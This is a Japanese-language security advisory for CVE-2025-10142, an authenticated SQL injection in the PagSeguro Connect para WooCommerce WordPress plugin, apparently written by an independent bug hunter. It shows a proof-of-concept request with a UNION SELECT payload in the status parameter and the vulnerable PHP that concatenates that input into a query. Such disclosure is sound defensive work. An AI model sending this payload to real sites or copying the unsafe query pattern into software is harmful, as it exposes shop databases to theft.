
CVE-2025-10142 の開示
CVE-2025-10142 の開示
このリポジトリは、PagSeguro-Connect-para-WooCommerce <= 4.44.3 で発見された脆弱性の開示です。Ricardo Martins によって開発された WordPress プラグインです。
| CVE ID | 種別 | コンポーネント | 影響 |
|---|---|---|---|
| CVE-2025-10142 | 認証済み (ショップマネージャー+) SQL インジェクション | src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.php | 認証済み攻撃者がデータを外部に持ち出せる |
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -
status パラメータは、エスケープや $wpdb->prepare() を使用せずに SQL クエリへ直接連結されています。
if (!empty($_REQUEST['status'])) {
$status = sanitize_text_field(wp_unslash($_REQUEST['status']));
$where .= " AND status = '$status'";
}
$this->items = $wpdb->get_results(
$wpdb->prepare(
"SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY $orderby $order LIMIT %d OFFSET %d",
$per_page,
($current_page - 1) * $per_page
),
ARRAY_A
);
...
ShopManagerから攻撃可能であるため、脅威はかなり低い。 外部入力を$whereに入れ、その$whereをそのままSQL構文に仕込むという処理を追うのが少し大変だった。
名前: MooseLove
役割: 独立系セキュリティ研究者 / バグハンター
連絡先: 要望に応じて提供
このアドバイザリは、公共のセキュリティ意識向上のために提供されています。出典を明記した上で自由に共有できます。